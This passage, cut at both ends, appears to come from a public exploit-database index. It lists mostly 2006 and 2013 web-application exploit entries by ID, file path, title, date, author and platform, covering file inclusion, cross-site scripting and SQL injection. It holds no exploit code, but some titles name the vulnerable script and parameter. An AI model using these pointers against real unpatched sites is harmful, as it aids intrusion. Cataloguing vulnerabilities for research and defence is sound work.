'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps, -28393,exploits/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps, -28396,exploits/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps, -28399,exploits/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps, -40378,exploits/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps, -28402,exploits/php/webapps/28402.txt,"Blog:CMS 4.1 - 'Dir_Plugins' Multiple Remote File Inclusions",2006-08-17,Drago84,php,webapps, -28403,exploits/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusions",2006-08-18,O.U.T.L.A.W,php,webapps, -28404,exploits/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Multiple Remote File Inclusions",2006-08-18,Crackers_Child,php,webapps, -28406,exploits/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps, -28409,exploits/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps, -28410,exploits/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps, -28411,exploits/php/webapps/28411.txt,"DieselScripts Job Site - 'Forgot.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps, -28412,exploits/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps, -28413,exploits/php/webapps/28413.txt,"cPanel 10.x - 'dohtaccess.html?dir' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps, -28414,exploits/php/webapps/28414.txt,"cPanel 10.x - 'editit.html?File' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps, -28415,exploits/php/webapps/28415.txt,"cPanel 10.x - 'showfile.html?File' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps, -28416,exploits/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps, -28417,exploits/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - 'TCMS_Administer' Remote File Inclusion",2006-08-21,You_You,php,webapps, -28418,exploits/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps, -28419,exploits/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps, -28422,exploits/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - 'Getad.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps, -28423,exploits/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps, -28426,exploits/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - 'HPEInc' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps, -28428,exploits/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,php,webapps, -28429,exploits/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps, -28430,exploits/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps, -28431,exploits/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps, -28432,exploits/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps, -28433,exploits/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps, -28434,exploits/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps, -28435,exploits/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps, -28436,exploits/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps, -28437,exploits/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps, -28439,exploits/php/webapps/28439.txt,"HLstats 1.34 - 'hlstats.php' Cross-Site Scripting",2006-08-29,kefka,php,webapps, -28440,exploits/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusions",2006-08-29,sCORPINo,php,webapps, -28441,exploits/php/webapps/28441.txt,"IwebNegar 1.1 - 'comments.php' SQL Injection",2006-08-30,Hessam-x,php,webapps, -28442,exploits/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps, -28443,exploits/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps, -28444,exploits/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,php,webapps, -28446,exploits/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps, -28447,exploits/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"James Bercegay",php,webapps, -28749,exploits/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28750,exploits/php/webapps/28750.txt,"osCommerce 2.2 - '/admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28751,exploits/php/webapps/28751.txt,"osCommerce 2.2 - '/admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps, -28464,exploits/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - 'Headeruserdata.php' SQL Injection",2006-08-30,DarkFig,php,webapps, -28465,exploits/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - 'Loginreq2.php' Cross-Site Scripting",2006-08-30,DarkFig,php,webapps, -28466,exploits/php/webapps/28466.txt,"Learn.com - 'Learncenter.asp' Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps, -28467,exploits/php/webapps/28467.txt,"ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions",2006-08-31,Matdhule,php,webapps, -28468,exploits/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusions",2006-09-01,MATASANOS,php,webapps, -28452,exploits/php/webapps/28452.txt,"WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps, -28453,exploits/php/webapps/28453.txt,"EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28454,exploits/php/webapps/28454.txt,"EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28455,exploits/php/webapps/28455.txt,"EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28456,exploits/php/webapps/28456.txt,"EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28457,exploits/php/webapps/28457.txt,"EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28458,exploits/php/webapps/28458.txt,"EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28459,exploits/php/webapps/28459.txt,"EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28460,exploits/php/webapps/28460.txt,"EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28461,exploits/php/webapps/28461.txt,"EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28462,exploits/php/webapps/28462.txt,"EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps, -28470,exploits/php/webapps/28470.txt,"VBZoom 1.11 - 'profile.php' Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps, -28471,exploits/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps, -28472,exploits/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps, -28473,exploits/php/webapps/28473.txt,"Autentificator 2.01 - 'Aut_Verifica.Inc.php' SQL Injection",2006-09-02,SirDarckCat,php,webapps, -28485,exploits/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps, -28486,exploits/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps, -28487,exploits/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps, -28488,exploits/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,php,webapps, -28490,exploits/php/webapps/28490.txt,"SoftBB 0.1 - 'Page' Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps, -28492,exploits/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps, -28493,exploits/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps, -28494,exploits/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps, -28495,exploits/php/webapps/28495.txt,"TWiki 4.0.x - 'Viewfile' Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps, -28496,exploits/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,php,webapps, -28497,exploits/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps, -28498,exploits/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps, -28499,exploits/php/webapps/28499.txt,"Vikingboard 0.1 - 'topic.php' SQL Injection",2006-09-08,Hessam-x,php,webapps, -28502,exploits/php/webapps/28502.txt,"TextAds - 'delete.php?id' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps, -28503,exploits/php/webapps/28503.txt,"TextAds - 'error.php?error' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps, -28505,exploits/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps, -29215,exploits/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - 'QB_Path' Multiple Remote File Inclusions",2006-12-27,Shell,php,webapps, -28510,exploits/php/webapps/28510.txt,"PHProg 1.0 - 'index.php?album' Cross-Site Scripting",2006-09-11,cdg393,php,webapps, -28511,exploits/php/webapps/28511.txt,"PHProg 1.0 - 'index.php?lang' Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps, -28514,exploits/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - 'Terminal' Directory Traversal",2006-09-12,"Chris Murtagh",cgi,webapps, -28515,exploits/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - 'rightbar.php?suser' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps, -28516,exploits/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - 'open_tickets.php?ticket_id' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps, -28517,exploits/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php?cons_page_title' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps, -40377,exploits/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-09-13,"Benjamin Daniel Mussler",linux,webapps, -28518,exploits/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps, -28519,exploits/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps, -28520,exploits/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps, -28522,exploits/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28523,exploits/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28524,exploits/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28525,exploits/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28526,exploits/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - 'help.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28527,exploits/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - 'smile.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28528,exploits/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28529,exploits/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28530,exploits/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28531,exploits/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - '/help/en/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28532,exploits/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp0.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28533,exploits/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp1.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28534,exploits/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp2.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28535,exploits/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - '/help/de/adminhelp3.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28536,exploits/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - 'entry.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28537,exploits/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/preview.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28538,exploits/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/log.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28539,exploits/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28540,exploits/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/config.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28541,exploits/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps, -28543,exploits/php/webapps/28543.txt,"ForumJBC 4.0 - 'Haut.php' Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps, -28544,exploits/php/webapps/28544.txt,"K2News Management 1.3 - 'Ratings.php' Cross-Site Scripting",2006-09-13,meto5757,php,webapps, -28545,exploits/php/webapps/28545.txt,"e107 website system 0.7.5 - 'contact.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28546,exploits/php/webapps/28546.txt,"e107 website system 0.7.5 - 'download.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28547,exploits/php/webapps/28547.txt,"e107 website system 0.7.5 - 'admin.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28548,exploits/php/webapps/28548.txt,"e107 website system 0.7.5 - 'fpw.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28549,exploits/php/webapps/28549.txt,"e107 website system 0.7.5 - 'news.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28551,exploits/php/webapps/28551.txt,"e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28552,exploits/php/webapps/28552.txt,"e107 website system 0.7.5 - 'signup.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28554,exploits/php/webapps/28554.txt,"e107 website system 0.7.5 - 'submitnews.php?PATH_INFO' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28555,exploits/hardware/webapps/28555.txt,"Good for Enterprise 2.2.2.1611 - Cross-Site Scripting",2013-09-25,Mario,hardware,webapps, -28556,exploits/php/webapps/28556.txt,"e107 website system 0.7.5 - 'user.php?Query String (PATH_INFO)' Cross-Site Scripting",2006-09-13,zark0vac,php,webapps, -28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 -28558,exploits/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps, -28658,exploits/php/webapps/28658.txt,"MyPhotos 0.1.3b - 'index.php' Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps, -28659,exploits/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - 'login.php' Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps, -28660,exploits/php/webapps/28660.php,"cPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps, -28560,exploits/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps, -28562,exploits/hardware/webapps/28562.txt,"Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery",2013-09-26,"Hubert Gradek",hardware,webapps, -28563,exploits/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps, -28564,exploits/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps, -38990,exploits/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection",2015-12-15,"Linux Zone Research Team",php,webapps,80 -28565,exploits/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps, -28566,exploits/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,asp,webapps, -28567,exploits/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injections",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps, -28568,exploits/php/webapps/28568.txt,"NX5Linkx 1.0 - 'links.php' HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps, -28569,exploits/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps, -28570,exploits/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps, -28571,exploits/php/webapps/28571.txt,"DCP-Portal 6.0 - '/admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps, -28572,exploits/php/webapps/28572.txt,"DCP-Portal 6.0 - '/admin/inc/header.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps, -28573,exploits/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php?Username' SQL Injection",2006-09-14,"HACKERS PAL",php,webapps, -28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps, -28575,exploits/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusions",2006-09-14,"Saudi Hackrz",php,webapps, -28577,exploits/asp/webapps/28577.txt,"ClickBlog! 2.0 - 'default.asp' SQL Injection",2006-09-14,ajann,asp,webapps, -28580,exploits/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps, -28581,exploits/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - 'galleryuploadfunction.php' Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps, -28582,exploits/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps, -28583,exploits/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps, -28584,exploits/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps, -28585,exploits/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps, -28586,exploits/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple SQL Injections",2006-09-15,"HACKERS PAL",php,webapps, -28587,exploits/asp/webapps/28587.txt,"EasyPage 7 - 'Default.aspx' SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps, -28589,exploits/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - 'members.asp' Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps, -28590,exploits/php/webapps/28590.txt,"Hitweb 3.0 - 'REP_CLASS' Multiple Remote File Inclusions",2006-09-16,ERNE,php,webapps, -28591,exploits/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 - 'profile.php' Multiple SQL Injections",2006-09-16,"HACKERS PAL",php,webapps, -28592,exploits/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 - 'pm.php?replyuser' Cross-Site Scripting",2006-09-16,"HACKERS PAL",php,webapps, -28593,exploits/asp/webapps/28593.txt,"ZilekPortal 1.0 - 'Haberdetay.asp' SQL Injection",2006-09-16,chernobiLe,asp,webapps, -28594,exploits/php/webapps/28594.txt,"Artmedic Links 5.0 - 'index.php' Remote File Inclusion",2006-09-16,botan,php,webapps, -28597,exploits/asp/webapps/28597.txt,"ECardPro 2.0 - 'search.asp' SQL Injection",2006-09-18,ajann,asp,webapps, -28598,exploits/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,php,webapps, -28599,exploits/php/webapps/28599.txt,"NixieAffiliate 1.9 - 'lostpassword.php' Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps, -28600,exploits/asp/webapps/28600.txt,"EShoppingPro 1.0 - 'Search_Run.asp' SQL Injection",2006-09-18,ajann,asp,webapps, -28601,exploits/php/webapps/28601.txt,"PT News 1.7.8 - 'search.php' Cross-Site Scripting",2006-09-18,Snake,php,webapps, -28603,exploits/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps, -28604,exploits/php/webapps/28604.txt,"ESyndiCat 1.5 - 'search.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps, -28605,exploits/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'downloadfile' Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps, -28606,exploits/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updatemail' Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps, -28607,exploits/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps, -28608,exploits/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'maillist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps, -28609,exploits/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_id' Servlet Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps, -28610,exploits/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_name' Servlet Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps, -28611,exploits/php/webapps/28611.txt,"RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps, -28612,exploits/php/webapps/28612.txt,"RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps, -28613,exploits/php/webapps/28613.txt,"RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps, -28614,exploits/php/webapps/28614.txt,"RedBLoG 0.5 - '/admin/index.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps, -28615,exploits/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",asp,webapps, -28616,exploits/php/webapps/28616.txt,"A.I-Pifou 1.8 - 'Choix_langue.php' Directory Traversal",2006-09-20,cdg393,php,webapps, -28617,exploits/php/webapps/28617.txt,"BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28618,exploits/php/webapps/28618.txt,"BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28619,exploits/php/webapps/28619.txt,"BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28620,exploits/php/webapps/28620.txt,"BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28621,exploits/php/webapps/28621.txt,"BandSite CMS 1.1 - 'header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28622,exploits/php/webapps/28622.txt,"BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28623,exploits/php/webapps/28623.txt,"BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28624,exploits/php/webapps/28624.txt,"BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28625,exploits/php/webapps/28625.txt,"BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28626,exploits/php/webapps/28626.txt,"BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28627,exploits/php/webapps/28627.txt,"BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28628,exploits/php/webapps/28628.txt,"BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps, -28629,exploits/php/webapps/28629.txt,"BandSite CMS 1.1 - 'merch_content.php' Cross-Site 